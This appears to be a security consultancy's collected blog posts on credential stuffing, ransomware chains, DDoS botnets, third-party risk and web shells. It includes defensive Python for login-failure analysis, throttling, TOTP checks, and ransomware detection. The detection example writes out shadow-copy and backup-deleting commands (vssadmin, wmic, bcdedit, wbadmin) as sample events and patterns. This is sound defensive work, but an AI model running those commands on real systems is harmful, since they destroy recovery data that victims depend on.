Threat actors also exploit single factor authentication to gain access to victims’ IT infrastructure, such as cloud servers, through credential stuffing attacks. In a credential stuffing attack, an attacker replays username and password pairs stolen in other organizations’ data breaches, betting that people reuse the same credentials across services.
The difference between credential stuffing and brute force is that credential stuffing guesses are drawn from stolen username and password lists, while brute-force guesses have no such basis: they work through dictionaries, common patterns or, in some attempts, random characters.
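The two patterns leave different fingerprints in failed-logon telemetry, and the ratio of distinct accounts to attempts is enough to tell them apart. The Python below is an added example written for this guide, not code from Microsoft or Akamai. It works on a constructed, flattened rendering of Windows Security Event 4625 (failed logon) lines; the 10-minute window, the 10-attempt floor and the 0.2/0.8 ratio cut-offs are illustrative thresholds, not published ones.

```python
from collections import defaultdict
from datetime import datetime, timedelta, timezone


def constructed_log():
    """Build a constructed failed-logon log (not real telemetry) in a flattened
    Windows Security Event 4625 shape:
    '<utc time> 4625 user=<name> ip=<source> type=<logon type>'.
    LogonType 10 is RemoteInteractive (RDP); 3 is Network, which is also what a
    failed RDP sign-in produces when Network Level Authentication rejects it."""
    base = datetime(2020, 3, 10, 2, 0, 0, tzinfo=timezone.utc)
    fmt = "%Y-%m-%dT%H:%M:%SZ"
    lines = []
    # Brute force: one source guesses 'Administrator' 40 times in four minutes.
    for i in range(40):
        t = base + timedelta(seconds=6 * i)
        lines.append(f"{t.strftime(fmt)} 4625 user=Administrator ip=203.0.113.10 type=10")
    # Credential stuffing: 30 sources, each trying one distinct leaked account once.
    for i in range(30):
        t = base + timedelta(seconds=8 * i)
        lines.append(f"{t.strftime(fmt)} 4625 user=user{i:02d} ip=198.51.100.{i + 1} type=3")
    # Benign noise: one employee mistypes a password twice.
    for i in range(2):
        t = base + timedelta(seconds=30 * i)
        lines.append(f"{t.strftime(fmt)} 4625 user=jsmith ip=192.0.2.7 type=10")
    return "\n".join(lines)


def parse(text):
    """Parse the flattened log into events; lines that are not 4625 are skipped."""
    events = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) < 5 or parts[1] != "4625":
            continue
        fields = dict(p.split("=", 1) for p in parts[2:])
        events.append({
            "ts": datetime.strptime(parts[0], "%Y-%m-%dT%H:%M:%SZ").replace(tzinfo=timezone.utc),
            "user": fields["user"].lower(),
            "ip": fields["ip"],
            "logon_type": fields["type"],
        })
    return events


def verdict(events, min_attempts=10):
    """Label one group of failures by how the guesses are spread across accounts.
    Few accounts hit many times each reads as brute force; many accounts hit
    once or twice each reads as credential stuffing."""
    attempts = len(events)
    if attempts < min_attempts:
        return "below_threshold"
    ratio = len({e["user"] for e in events}) / attempts
    if ratio <= 0.2:
        return "brute_force"
    if ratio >= 0.8:
        return "credential_stuffing"
    return "mixed"


def analyse(text, window=timedelta(minutes=10), min_attempts=10):
    """Judge each time window twice: per source IP (catches a single noisy host),
    then over the residual events from sources not already flagged (catches a
    campaign spread across many IPs that no per-IP counter would notice)."""
    events = parse(text)
    if not events:
        return {}
    start = min(e["ts"] for e in events)
    buckets = defaultdict(list)
    for e in events:
        buckets[int((e["ts"] - start) / window)].append(e)
    results = {}
    for idx, evs in sorted(buckets.items()):
        by_ip = defaultdict(list)
        for e in evs:
            by_ip[e["ip"]].append(e)
        per_ip = {ip: verdict(v, min_attempts) for ip, v in by_ip.items()}
        flagged = {ip for ip, v in per_ip.items() if v != "below_threshold"}
        residual = [e for e in evs if e["ip"] not in flagged]
        results[idx] = {
            "window_start": start + idx * window,
            "per_ip": per_ip,
            "residual": verdict(residual, min_attempts),
        }
    return results


if __name__ == "__main__":
    for idx, r in analyse(constructed_log()).items():
        noisy = {ip: v for ip, v in r["per_ip"].items() if v != "below_threshold"}
        print(f"window {idx} from {r['window_start']:%H:%M}: per-IP {noisy}, residual {r['residual']}")
```

Judging per source IP alone would miss the second pattern: each of the 30 stuffing sources makes exactly one attempt, so none of them trips a threshold on its own. That is why the residual check over the unflagged sources is there, and why the same logic applies to any sign-in endpoint, RDP or otherwise.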
In the past 10 years, billions of username and password combinations have been stolen from individuals and organizations around the globe. Some of these stolen credentials are posted publicly online; others are sold on dark web markets.
Have I Been Pwned, a site that lets internet users check whether their accounts appear in known data breaches, holds billions of breached account records. In April 2019, the group known as “GnosticPlayers” had released online the breached records of nearly one billion users, including usernames and passwords.
While the success rate of credential stuffing is only about 0.1%, roughly one success for every 1,000 attempts, the sheer volume of stolen credentials makes it worthwhile: at 0.1%, one million attempts yield roughly 1,000 compromised accounts.
APIs, short for application programming interfaces, are favourite targets of malicious actors in credential stuffing attacks. An API lets two systems communicate with one another and gives easy, scriptable access to a third-party platform such as cloud storage, which suits automated login attempts that never have to render a web page. Akamai reported that from December 2017 to November 2019 it observed nearly 85.5 billion credential stuffing attacks across its customer base. Of those, 16.5 billion were directed against hostnames clearly identified as API endpoints, that is, the server-side URL at one end of a communication channel.
Brute force and credential stuffing succeed largely because many systems allow an unlimited number of username and password guesses. Throttling, that is, limiting the number of failed attempts a source may make in a given period, mitigates both, but attackers bypass naive per-IP throttling with a low-and-slow approach: spreading attempts out so that each source stays just under the limit.
Akamai reported that credential stuffing attackers take advantage of unlimited guessing by trying tens of thousands of credentials in minutes. The Microsoft Defender ATP Research Team, meanwhile, reported that RDP brute-force attacks last 2 to 3 days on average, with about 90% of cases lasting one week or less and fewer than 5% lasting two weeks or more.
Cybercriminals launch millions of these brute-force and credential stuffing attempts in a short span of time by using internet bots, software applications that run automated tasks over the internet. To automate the attacks at scale, attackers use botnets: groups of hijacked computers under a criminal’s control, used for brute-force attacks, credential stuffing and distributed denial-of-service (DDoS) attacks alike.
With a botnet, attackers launch many login attempts simultaneously, and the attempts appear to come from different computers in different locations. Some botnets consist of a few thousand hijacked machines, others of millions. Because each bot contributes only a handful of attempts, the botnet sidesteps defences such as banning an IP address after too many failed logins.
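To see why per-IP throttling alone is not enough, here is a layered failure budget with a sliding window, run against four constructed attempt streams. It is an added example written for this guide, not any product’s throttling logic; the limits (10 failures per source per 5 minutes, 15 per account per hour, 200 service-wide per minute) are illustrative assumptions.

```python
from collections import Counter, defaultdict, deque


class SlidingWindowCounter:
    """Remembers failure timestamps per key and answers 'over budget?' for a window."""

    def __init__(self, limit, window_seconds):
        self.limit = limit
        self.window = window_seconds
        self.failures = defaultdict(deque)

    def _prune(self, key, now):
        q = self.failures[key]
        while q and q[0] <= now - self.window:   # drop failures that fell out of the window
            q.popleft()

    def over_budget(self, key, now):
        self._prune(key, now)
        return len(self.failures[key]) >= self.limit

    def record(self, key, now):
        self._prune(key, now)
        self.failures[key].append(now)


class LoginGate:
    """Layered failure budgets. Thresholds are illustrative assumptions, not a standard."""

    def __init__(self, layers=("ip", "account", "global")):
        self.layers = {
            "ip": SlidingWindowCounter(limit=10, window_seconds=300),        # one source, 5 minutes
            "account": SlidingWindowCounter(limit=15, window_seconds=3600),  # one account, 1 hour
            "global": SlidingWindowCounter(limit=200, window_seconds=60),    # whole service, 1 minute
        }
        self.active = [name for name in ("ip", "account", "global") if name in layers]

    def attempt(self, now, ip, user, password_ok):
        keys = {"ip": ip, "account": user.lower(), "global": "*"}
        if any(self.layers[name].over_budget(keys[name], now) for name in self.active):
            return "throttled"          # refused before the password is even checked
        if password_ok:
            return "ok"
        for name in self.active:
            self.layers[name].record(keys[name], now)
        return "denied"


def simulate(stream, layers=("ip", "account", "global")):
    """Run a constructed attempt stream through a fresh gate; returns outcome counts."""
    gate = LoginGate(layers)
    return dict(Counter(gate.attempt(*a) for a in stream))


# Constructed attack streams: (seconds since start, source ip, account, password correct?)
FAST_BRUTE = [(t, "203.0.113.10", "admin", False) for t in range(60)]            # 1/s, one source
LOW_AND_SLOW = [(60 * i, "203.0.113.11", "admin", False) for i in range(30)]     # 1/min, one source
DISTRIBUTED = [(i, f"198.51.100.{i}", "admin", False) for i in range(1, 31)]     # 30 sources, one account
STUFFING = [(0.1 * i, f"10.0.{i // 250}.{i % 250}", f"user{i}", False) for i in range(500)]  # 500 sources, 500 accounts

if __name__ == "__main__":
    for name, stream in [("fast brute force", FAST_BRUTE), ("low and slow", LOW_AND_SLOW),
                         ("distributed", DISTRIBUTED), ("credential stuffing", STUFFING)]:
        print(f"{name:20s} per-IP only: {simulate(stream, ('ip',))}  all layers: {simulate(stream)}")
```

Per-IP throttling stops only the noisy single source. The low-and-slow stream and the distributed stream both stay under it and are caught by the per-account budget, while the credential stuffing stream, one attempt per account from one source each, slips past both and only trips the service-wide budget. Note that account-level lockouts also hand attackers a denial-of-service lever against legitimate users, which is one more reason a second factor matters more than any threshold.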
Multi-factor authentication defeats most brute-force and credential stuffing attacks. Besides the correct username and password, the user must provide something else, such as a one-time code from an authenticator app or hardware token, a face ID or a fingerprint, things a bot replaying a stolen password cannot supply. One caveat: codes delivered by SMS and push-notification prompts can still be phished or approved by a fatigued user, so phishing-resistant factors such as hardware security keys are the stronger choice for administrator accounts.
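What the second factor actually adds is shown below with a time-based one-time password (TOTP, RFC 6238) check in Python. This is an added example written for this guide, not code from any vendor; the in-memory user store, the PBKDF2 parameters and the one-step clock-skew tolerance are choices made for the example, and the secret used at the bottom is the one from RFC 6238’s published reference vectors, not a real key.

```python
import hashlib
import hmac
import os
import struct

# Constructed in-memory user store for the example: username -> record.
USERS = {}
PBKDF2_ROUNDS = 200_000


def hotp(secret, counter, digits=6, digestmod=hashlib.sha1):
    """RFC 4226 HOTP: HMAC over the 8-byte big-endian counter, dynamic truncation, modulo 10^digits."""
    mac = hmac.new(secret, struct.pack(">Q", counter), digestmod).digest()
    offset = mac[-1] & 0x0F
    code = struct.unpack(">I", mac[offset:offset + 4])[0] & 0x7FFFFFFF
    return str(code % (10 ** digits)).zfill(digits)


def totp(secret, unix_time, step=30, digits=6, digestmod=hashlib.sha1):
    """RFC 6238 TOTP: HOTP whose counter is the number of 30-second steps since the epoch."""
    return hotp(secret, int(unix_time) // step, digits, digestmod)


def match_totp(secret, code, unix_time, step=30, digits=6, skew=1):
    """Return the time-step counter the submitted code matches, accepting +-skew steps
    of clock drift between server and authenticator, or None. Compares in constant time."""
    base = int(unix_time) // step
    for counter in range(base - skew, base + skew + 1):
        if hmac.compare_digest(hotp(secret, counter, digits), str(code)):
            return counter
    return None


def register(username, password, totp_secret):
    """Enrol a user: salted PBKDF2 password hash plus the shared TOTP secret."""
    salt = os.urandom(16)
    USERS[username] = {
        "salt": salt,
        "pw_hash": hashlib.pbkdf2_hmac("sha256", password.encode(), salt, PBKDF2_ROUNDS),
        "secret": totp_secret,
        "last_counter": -1,   # highest time step already accepted; blocks replay of a captured code
    }


def login(username, password, code, unix_time):
    """Both factors must pass. Distinct reasons are returned here so the example is readable;
    a production endpoint should return one uniform failure message."""
    rec = USERS.get(username)
    if rec is None:
        return "no_such_user"
    pw = hashlib.pbkdf2_hmac("sha256", password.encode(), rec["salt"], PBKDF2_ROUNDS)
    if not hmac.compare_digest(pw, rec["pw_hash"]):
        return "bad_password"
    counter = match_totp(rec["secret"], code, unix_time)
    if counter is None:
        return "bad_code"        # right password, but nothing a password-replaying bot can supply
    if counter <= rec["last_counter"]:
        return "replayed"        # this code (or an older one) was already used
    rec["last_counter"] = counter
    return "ok"


if __name__ == "__main__":
    # Shared secret from the RFC 6238 Appendix B reference vectors, used only as test data.
    secret = b"12345678901234567890"
    register("alice", "correct horse battery staple", secret)
    now = 1234567890
    print(login("alice", "correct horse battery staple", "000000", now))
    print(login("alice", "correct horse battery staple", totp(secret, now), now))
```

A stolen or guessed password gets the attacker only as far as bad_password or bad_code: the code changes every 30 seconds and is derived from a secret that never crosses the wire. The last_counter check stops a code captured in transit from being replayed inside its validity window, which is the residual gap a plain TOTP check leaves open.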
While we always recommend multi-factor authentication, in many cases businesses never evaluate even such basic IT controls and fall victim to cyberattacks.
Connect with us today and our team will evaluate your IT controls so that decision makers understand the business impact and know what to focus on, both short and long term.
Growing Threat of Ransomware Reinfection
Switzerland's cybersecurity body, the Reporting and Analysis Centre for Information Assurance (MELANI), has cautioned local SMEs and large organizations against paying ransomware attackers due to the risk of ransomware reinfection.
In a recent advisory to local organizations in Switzerland, MELANI said it is aware of cases in Switzerland and abroad where the same organization was hit by ransomware several times within a very short period. Ransomware is malicious software (malware) that encrypts victims’ files and demands a ransom in exchange for the decryption key that would unlock them.
According to MELANI, even if a ransom is paid, there’s no guarantee that the ransomware attacker will decrypt the data. Switzerland's cybersecurity body also cautioned that even when ransom payment is made, leading to the decryption of the encrypted data, the underlying infection of some ransomware will remain active. “As a result, the attackers still have full access to the affected company's network and can, for example, reinstall ransomware,” MELANI said.
Emotet and TrickBot are two of the malware families MELANI cites as able to cause ransomware reinfection even after the ransom is paid and the data decrypted.
In October 2019, the Canadian Centre for Cyber Security issued an alert to organizations in Canada about a 3-in-1 infection process involving three malware families: Emotet, TrickBot and Ryuk. According to the Canadian Centre for Cyber Security, the three form a staged infection chain, with Emotet downloaded first, TrickBot second, and Ryuk ransomware deployed last against victims’ networks by an organized and prolific actor or group of actors.
Emotet, first detected in 2014, is a malware that’s distributed through emails containing malicious links or attachments. Victims are tricked into clicking these malicious links or attachments as the group behind Emotet uses branding familiar to the recipients.
According to the US Cybersecurity and Infrastructure Security Agency, once Emotet is downloaded onto the victim’s computer, it uses a credential enumerator packaged as a self-extracting RAR file. This enumerator, the agency says, contains two components: a bypass component and a service component. The bypass component is used to find writable share drives over SMB and to brute force user accounts, including the administrator account, by trial and error. The service component, meanwhile, writes Emotet onto the compromised computer’s disk.
SMB, short for Server Message Block, is a network protocol used by computers running Microsoft Windows that allows systems within the same network to share files. “Emotet’s access to SMB can result in the infection of entire domains (servers and clients),” US Cybersecurity and Infrastructure Security Agency said.
Once the attacker gains access on the victim’s network via Emotet, the Trickbot malware is then downloaded and distributed to the compromised systems.
Trickbot, first detected in 2016, is a malware that has similar capabilities as Emotet. Similar to Emotet, Trickbot can brute force users’ accounts and spread onto as many computers as possible using SMB.
Analysis of TrickBot showed that this malware uses PowerShell Empire, a publicly available tool. Released as a legitimate penetration testing tool in 2015, PowerShell Empire has become a favourite among well-financed threat groups.
PowerShell Empire allows an attacker to escalate privileges, harvest credentials, exfiltrate information, and move laterally across the victim’s network. It is difficult to detect with traditional antivirus software because it operates almost entirely in memory and runs on PowerShell, a legitimate application. The attackers then use Empire to deploy Ryuk ransomware on high-value targets.
According to the Canadian Centre for Cyber Security, Trickbot’s capabilities allow it “to map out the network and give the malicious actor a better understanding of the target, including the value of the data.”
Ryuk ransomware first appeared in 2018. On its own, this ransomware doesn’t have the ability to spread onto as many machines as possible within a network, hence the dependency on other malware such as Emotet and Trickbot.
“The Ryuk ransomware itself does not contain the ability to move laterally within a network, hence the reliance on access via a primary infection, but it does, however, have the ability to enumerate network shares and encrypt those it can access,” UK's National Cyber Security Centre said. “This, coupled with the ransomware’s use of anti-forensic recovery techniques (such as manipulating the virtual shadow copy), is a technique to make recovering from backups difficult.”
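The shadow copy manipulation the NCSC mentions is one of the most reliable early signals that a ransomware payload has started running, and it is cheap to watch for. The Python below is an added detection example written for this guide, not a vendor rule set; it runs a handful of command-line patterns over constructed process-creation events in the shape of Sysmon Event ID 1 / Windows 4688 records. The patterns cover the common ways shadow copies and recovery are disabled (vssadmin, wmic, the WMI class from PowerShell, bcdedit, wbadmin), and the list of “usual” parent processes is an illustrative assumption.

```python
import re

# Constructed process-creation events in the shape of Sysmon Event ID 1 / Windows 4688
# records (not real telemetry). Only the fields the rules use are included.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\vssadmin.exe", "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "vssadmin.exe Delete Shadows /All /Quiet"},
    {"Image": r"C:\Windows\System32\wbem\WMIC.exe", "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "wmic shadowcopy delete"},
    {"Image": r"C:\Windows\System32\bcdedit.exe", "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "bcdedit /set {default} recoveryenabled No"},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Users\jsmith\Downloads\invoice.exe",
     "CommandLine": 'powershell -nop -c "Get-WmiObject Win32_Shadowcopy | ForEach-Object { $_.Delete() }"'},
    {"Image": r"C:\Windows\System32\vssadmin.exe", "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "vssadmin list shadows"},          # benign: lists, does not delete
    {"Image": r"C:\Windows\System32\wbadmin.exe", "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "wbadmin delete catalog -quiet"},
]

# Command-line patterns for disabling Windows recovery. Case-insensitive; the ".exe"
# is optional because the extension is often dropped or added to dodge exact matches.
RULES = [
    ("vssadmin_delete_shadows", re.compile(r"\bvssadmin(\.exe)?\b.*\bdelete\s+shadows\b", re.I)),
    ("vssadmin_resize_storage", re.compile(r"\bvssadmin(\.exe)?\b.*\bresize\s+shadowstorage\b", re.I)),
    ("wmic_shadowcopy_delete", re.compile(r"\bwmic(\.exe)?\b.*\bshadowcopy\b.*\bdelete\b", re.I)),
    ("powershell_shadowcopy_delete", re.compile(r"\bWin32_ShadowCopy\b.*\bDelete\s*\(", re.I)),
    ("bcdedit_disable_recovery", re.compile(
        r"\bbcdedit(\.exe)?\b.*\b(recoveryenabled\s+no|bootstatuspolicy\s+ignoreallfailures)\b", re.I)),
    ("wbadmin_delete_catalog", re.compile(r"\bwbadmin(\.exe)?\b.*\bdelete\s+catalog\b", re.I)),
]

# Parents from which an administrator plausibly runs these tools by hand (illustrative assumption).
USUAL_PARENTS = {"cmd.exe", "powershell.exe", "explorer.exe", "services.exe", "mmc.exe"}


def match_rules(event):
    """Return the names of every rule the event's command line matches."""
    cmd = " ".join(event.get("CommandLine", "").split())   # collapse padded whitespace
    return [name for name, rx in RULES if rx.search(cmd)]


def detect(events):
    """Run the rules over process-creation events and return the suspicious ones."""
    findings = []
    for ev in events:
        rules = match_rules(ev)
        if not rules:
            continue
        parent = ev.get("ParentImage", "").replace("\\", "/").rsplit("/", 1)[-1].lower()
        findings.append({
            "rules": rules,
            "image": ev.get("Image", ""),
            "parent": ev.get("ParentImage", ""),
            "cmd": ev.get("CommandLine", ""),
            # A recovery-wiping command spawned by something other than a shell or console
            # (here, an executable from a Downloads folder) deserves the highest priority.
            "unusual_parent": parent not in USUAL_PARENTS,
        })
    return findings


if __name__ == "__main__":
    for f in detect(SAMPLE_EVENTS):
        prio = "HIGH" if f["unusual_parent"] else "medium"
        print(f"[{prio}] {', '.join(f['rules'])}: {f['cmd']}  (parent {f['parent']})")
```

Administrators do occasionally run vssadmin by hand, so the parent process and the volume of matches across hosts, not the single match, decide the priority. Either way, a hit on the delete patterns is a signal to isolate the host first and investigate second, since what follows is encryption.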
Preventive and Mitigating Measures Against Ransomware
All too often, malware such as Emotet, TrickBot and Ryuk gets into victims’ networks because basic cybersecurity measures were ignored. Here are some basic measures to protect your organization’s network against such malware:
In the case of a Ryuk infection, it is important to note that cleaning up the affected computers is not enough. These “cleaned” computers can be reinfected, because the malware that delivers Ryuk, Emotet and TrickBot, may still be lurking on networked systems that were not initially hit by the ransomware.
DDoS Attacks Are Getting Smaller, Shorter & More Persistent, Study Shows
A recent study released by Imperva showed that DDoS attacks are getting smaller, shorter and more persistent – a trend that shows that attackers are hoping to cause great damage before the activation of DDoS mitigating measures.
What Is DDoS Attack?
DDoS, short for distributed denial-of-service, is a type of cyber-attack in which multiple computers operate together as one to attack a target, for instance, a particular website.
Attackers typically use botnets to carry out DDoS attacks. A botnet is a group of internet-connected computers that are hijacked by malicious actors. These hijacked computers are then controlled by attackers as one “zombie army” to attack a chosen target.
There are two general types of DDoS attack: network layer and application layer. In network layer DDoS attacks, malicious actors “clog the pipelines” connecting to the target network, with severe operational consequences such as the hosting account being suspended. In application layer DDoS attacks, malicious actors flood a target application with seemingly innocent requests, driving CPU and memory usage up until the application hangs or crashes.
In network layer DDoS attack, the attack is measured by gigabits per second (Gbps) or packets per second (PPS), while in application layer DDoS attack, the attack is measured by requests per second (RPS). Most mid-sized websites can be crippled by 50 to 100 RPS application layer DDoS attacks, and most network infrastructures can be shut down by 20 to 40 Gbps network layer DDoS attacks.
Prevalence of DDoS Attacks
“Overall, we saw attacks that were smaller, shorter, and more persistent,” Imperva said in the company’s 2019 Global DDoS Threat Landscape Report. The company said that this trend “may be indicative of attackers’ attempts to wreak havoc before a mitigation service kicks in”.
Imperva reported that most DDoS attacks in 2019 were short, with 51% lasting less than 15 minutes. The report also showed that DDoS attacks in 2019 were conducted in short streaks, with two-thirds of targets attacked up to five times and a quarter of targets attacked 10 times or more.
Imperva added that while the norm of DDoS attacks in 2019 was small, the company recorded the largest network layer DDoS attack and application layer DDoS attack. The company said it recorded a network layer DDoS attack that reached 580 million packets per second (PPS), and a separate application layer DDoS attack which lasted for 13 days and peaked at 292,000 Requests Per Second (RPS).
According to Imperva, the top attacked industries in 2019 were games (35.92%), gambling (31.25%), computers and internet (26.51%), business (3.37%) and finance (2.95%); while the top attacked territories were India (22.57%), Taiwan (14.79%), Hong Kong (12.23%), Philippines (11.36%) and United States (8.73%). In 2019, Imperva said application layer attack requests overwhelmingly came from the Philippines and China. The company, however, noted, “Those source origination points were notedly the location of the machines used to carry out the attacks, not necessarily the location of the attackers themselves.”
The Role of Botnets
Imperva’s analysis of the largest application layer DDoS attack, which lasted 13 days and peaked at 292,000 requests per second (RPS), showed that most of the attacking IPs had the same open ports: 2000 and 7547. Mirai variants are known to target IoT devices exposed to the internet on TCP ports 2000 and 7547.
The Mirai botnet was first observed in the wild in 2016. This botnet hijacked IoT devices via factory default usernames and passwords. The release of the Mirai’s source code on September 30, 2016 resulted in the development of new versions of Mirai, with some versions targeting different vendors of IoT devices and some adding new functionalities.
The DDoS attack on the domain name service (DNS) provider Dyn on October 21, 2016 was attributed to the Mirai botnet. The DDoS attack on Dyn resulted in temporarily bringing down America’s top websites such as Twitter, Netflix and Reddit.
In the 4th quarter of 2019, researchers at 360 Netlab reported two new botnets: Roboto and Mozi. In November 2019, 360 Netlab researchers reported that Roboto attacks Linux servers via CVE-2019-15107, a security vulnerability in the Webmin remote administration application. While Roboto has DDoS capability, the researchers said there was no evidence yet of a DDoS attack launched by this botnet.
In December 2019, researchers at 360 Netlab reported that Mozi attacks IoT devices, exploiting a handful of security vulnerabilities, including CVE-2014-8361, a security vulnerability in Realtek routers that allows remote attackers to execute arbitrary code, and CVE-2018-10562, a security vulnerability in GPON routers in which the router saves ping results, enabling attackers to execute commands and retrieve their outputs.
While a typical DDoS botnet is run from a command-and-control (C2) server, a computer controlled by the attacker that sends commands to the infected machines, both Roboto and Mozi rely on peer-to-peer (P2P) networks. In a P2P botnet, the infected computers or “bots” relay commands among themselves instead of reporting to one central server.
The use of P2P networks by cybercriminals is not new. For years, attackers have used P2P networks for everything from stealing data to delivering commands, precisely because there is no single C2 server to take down. Authorities such as the FBI and technology companies have had success in shutting down botnets that depend on C2 servers: take down the server and the zombie army of hijacked computers is left leaderless.
Would you like to learn more and see how to protect your organization and mitigate DDoS attacks in under 10-minutes, with no hardware or software to buy or install?
Third-party Risks: A New Frontier and a Major Concern for Businesses
Outsourcing to third parties helps businesses free up time and resources, both of which can be channelled back into core business tasks.
But whether the third party provides accounting, marketing, IT support, HR/payroll, customer service and support, or any other service, working with them carries an inherent element of risk. After all, these companies have access to sensitive data: contact details for employees and customers, payment information, login details for essential software and tools, and at times the company’s intellectual property.
And a cybersecurity breach could cause this data to fall into the hands of criminals. While most companies are well aware of this danger, too many fail to take action: 77 percent of Canadian small businesses are concerned about being hit by a cyber-attack, but 36 percent choose not to invest in effective security.
That’s a huge oversight. But it’s understandable that small businesses using third-party services for the first time overlook the need for caution when choosing a provider. Third-party risk is something of a new frontier, and technology continues to advance faster than non-experts can keep up with.
This creates a disconnect between businesses and the services they are paying for. As a result, a huge amount of trust is required, and third parties have to be transparent about how they use client data, their security measures, policies and procedures, and more.
In short: due diligence is critical when working with third parties, but what steps can businesses take to mitigate their risk?
Focus on Experienced Vendors and Don’t Cut Corners
Small and medium businesses might be tempted to go with the cheapest third-party service provider in their area. Money can be tight during the early years of building a brand, and usually for some time beyond, too.
But businesses can’t afford to cut corners when choosing vendors responsible for key services and with access to sensitive data.
Always take the time to do your due diligence and find a vendor with provable experience working with companies like your own. They should have a portfolio of satisfied clients they can discuss and be happy to provide references. Even if one of their past clients is in a different industry to your own, a positive experience should give real peace of mind and lend the vendor credibility.
Check for attestations and certifications from leading security brands on the vendor’s website. These are an excellent trust signal, and indicate the team takes its security seriously. Awards from leading publications or organizations reinforce a vendor’s credibility, too.
Make sure to look the vendor up online and search for reviews. If you find negative feedback, remember that not every bad review is genuine; a reputable provider should be willing to discuss it and explain the circumstances.
Speak to other business-owners and try to find recommendations for reliable third parties in your area. While price is obviously a major factor in your decision, don’t compromise too much just to save a few dollars.
Check their Program for Security Risk Assessments
Take steps to determine the vendor’s approach to security risk assessments, and how regularly they conduct them.
Beware of any team which can’t tell you when they last reviewed their security set-up or what steps they would take if they discovered a data breach. They should be well aware of all potential risks, which measures are necessary to prevent them, and how to communicate these to you in a language you understand.
Reliable vendors will take immediate action to fill any gaps they notice in their cybersecurity posture during assessments. They need to know which cybersecurity attacks their system is particularly vulnerable to, and how a successful attack would disrupt their services.
It’s also vital to find out what a vendor’s plan is for informing clients about a breach, and how they mitigate dangers. This should be documented and well-defined: beware of vendors who seem to be making their plans up on the fly. You want them to be transparent, well-prepared, and in control.
Keep Track of Access
Catalog which tools and files your third-party vendors have access to. You need to know which departments or individuals have permission to use your data, and you can’t always be sure this won’t be misused (by accident or design).
Ask vendors to explain why they require access, and don’t be afraid to get a second opinion if their reasoning doesn’t ring true. A reliable team will be able to explain their requests clearly.
Make sure to check files and tools on a regular basis, to confirm everything is as it should be. Report the first sign of any discrepancies.
Build Your Own Contingency Plans Around Vendors
You need to be prepared for an attack no matter how good your vendors are; it is no longer a matter of “if” but of “when”. And the preparation has to go deep, so your entire business knows how to proceed if the worst happens.
Think about critical systems which your daily operations depend on. If they were to go down, what processes could your workforce continue to perform? What alternative systems do you have to rely on, if any?
Determining the damage a cyber-attack would do to your company, and identifying ways to mitigate it, is crucial.
Next, consider the incident response readiness and the team. Which employees would be most valuable in this group? How would they be alerted to an incident and how long do you expect it to take for them to go into action?
Another important process to focus on when building your contingency plans is testing. Running experiments can help you assess the quality of your response to attacks, the length of time it would take to communicate with vendors, and how long it might take to get your systems operating again.
Try to make tests a learning process, so you can see where improvements are needed. You might find your vendor is hard to reach in a crisis, or they seem ill-equipped to provide the fast response promised. Either is a major red flag.
Third-party risks can increase businesses’ vulnerabilities to attack, but a cautious, strategic approach to choosing and monitoring vendors can help to keep you safe.
A professional security consulting service will help you understand the risks you face when working with third parties, how to manage them better, and how to keep your security at its best.
Better yet, some cybersecurity firms can help you implement an affordable and automated third-party assessment programme, including initial due diligence and on-going monitoring.
Want to schedule a free consultation and start improving your third-party cybersecurity posture? Just get in touch with our team now!
Microsoft Reports Growing Web Shell Attacks
Microsoft detects an average of 77,000 web shells each month on an average of 46,000 distinct servers, according to the company’s latest report.
What Is a Web Shell?
A web shell is malicious code that cybercriminals implant on an internet-facing server to remotely control it. It lets the criminals steal data from the compromised server or use it as a stepping stone for further attacks against the victim’s network.
China Chopper is an example of a web shell. First discovered in 2012, it remains one of the most widely used web shells nearly a decade on. Researchers at Cisco Talos Intelligence Group noted that because China Chopper is so widely available, it is nearly impossible to attribute this form of attack to a particular group.
Analysis of the China Chopper by researchers at Cisco Talos showed that this web shell allows attackers to retain access to an already compromised web server using a client-side application. This client-side application, the researchers said, contains all the logic needed to control the target, making it handy for threat actors to use. The researchers added that China Chopper only targets systems that run a web server application.
Web Shell Attacks
According to Microsoft, a victim of a web shell attack, an organization in the public sector that Microsoft did not name, enlisted Microsoft’s Detection and Response Team (DART) to conduct full incident response and remediate the attack before it could cause further damage.
DART’s investigation showed that the unnamed organization’s attackers implanted a web shell in multiple folders of the organization’s web server. This implanted web shell allowed the attackers to compromise the service accounts and domain admin accounts. DART’s investigation also showed that the initial implanted web shell allowed the attackers to look for additional target systems and install web shells on these additional targeted systems.
Threat groups ZINC, KRYPTON, and GALLIUM are known to have used web shells in their cyber-attacks. According to Microsoft, web shell attackers exploit the security vulnerabilities in web applications or web servers, including the lack of the latest security updates, as well as the lack of antivirus tools, lack of network protection, lack of proper security configuration and lack of informed security monitoring. Attacks typically happen during off-hours or weekends, when attacks are likely not immediately spotted and responded to, Microsoft said.
Security vulnerabilities referred to as CVE-2019-16759 and CVE-2019-0604 are some of those exploited by attackers, Microsoft added. Both CVE-2019-16759 and CVE-2019-0604 had been patched by their respective software vendors.
CVE-2019-16759 is a security vulnerability in vBulletin, a proprietary forum software used by more than 100,000 websites, including websites used by major companies and organizations. CVE-2019-0604, meanwhile, is a security vulnerability in Microsoft SharePoint – a web-based platform that integrates with Microsoft Office. Successful exploitation of CVE-2019-0604 allows an attacker to run malicious code in the context of the SharePoint application pool and the SharePoint server farm account.
On April 23, 2019, the Canadian Centre for Cyber Security issued an alert, warning Canadian organizations of the on-going cyber-attacks that first exploit the security vulnerability of Microsoft SharePoint, in particular, CVE-2019-0604, leading to the deployment of the China Chopper web shell. The following unpatched versions of Microsoft SharePoint are known to be affected: Microsoft SharePoint Server 2019, Microsoft SharePoint Server 2010 SP2, Microsoft SharePoint Foundation 2013 SP1 and Microsoft SharePoint Enterprise Server 2016.
"The China Chopper web shell is extensively used by hostile actors to remotely access compromised web-servers, where it provides file and directory management, along with access to a virtual terminal on the compromised device,” the Canadian Centre for Cyber Security said. “As China Chopper is just 4 Kb in size, and has an easily modifiable payload, detection and mitigation is difficult for network defenders.”
